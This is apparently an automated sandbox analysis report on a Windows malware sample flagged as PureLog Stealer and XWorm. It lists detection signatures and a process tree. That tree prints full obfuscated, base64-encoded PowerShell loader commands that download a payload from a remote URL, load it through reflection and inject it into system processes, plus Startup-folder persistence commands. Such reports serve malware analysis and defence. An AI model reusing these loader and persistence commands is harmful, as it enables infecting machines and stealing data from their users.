Windows
Analysis Report
TM3utH2CsU.exe
Overview
General Information
Sample name: | TM3utH2CsU.exe (renamed because original name is a hash value) |
Original sample name: | 3658f44acb4d331fa89ab43d782bee2a97a48b2f425cad29939ee472c74bc62f.exe |
Analysis ID: | 1518119 |
MD5: | 2b39077634e7172489d66ed8e66ae63a |
SHA1: | 600467d0e3eadb245e451930dee698d1fc37ca23 |
SHA256: | 3658f44acb4d331fa89ab43d782bee2a97a48b2f425cad29939ee472c74bc62f |
Tags: | exe, GuangdongKenuosiIoTNetworkTechnologyCoLtd, user-JAMESWT_MHT |
Detection
PureLog Stealer, XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected PureLog Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops VBS files to the startup folder
Drops script or batch files to the startup folder
Found suspicious ZIP file
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- TM3utH2CsU.exe (PID: 7740 cmdline:
"C:\Users\user\Desktop\TM3utH2CsU.exe" MD5: 2B39077634E7172489D66ED8E66AE63A) - cmd.exe (PID: 7844 cmdline:
"cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7856 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Acrobat.exe (PID: 7920 cmdline:
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\privacy_policy.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 8084 cmdline:
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7392 cmdline:
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1724,i,13391688068409325489,10583059356098987935,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - cmd.exe (PID: 5072 cmdline:
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4920 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 5680 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 1864 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6008 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3768 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 6392 cmdline:
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5024 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 5268 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 4920 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2032 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6320 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 4928 cmdline:
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6676 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 4924 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3644 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8200 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8280 cmdline:
"cmd" /C echo %username% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8292 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8328 cmdline:
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8336 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8396 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8468 cmdline:
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8476 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 8520 cmdline:
ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 7204 cmdline:
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 604 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1704 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1504 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 '+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 3864 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 8868 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - cmd.exe (PID: 8544 cmdline:
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8552 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8612 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8668 cmdline:
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8676 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 8712 cmdline:
ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 9060 cmdline:
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 4252 cmdline:
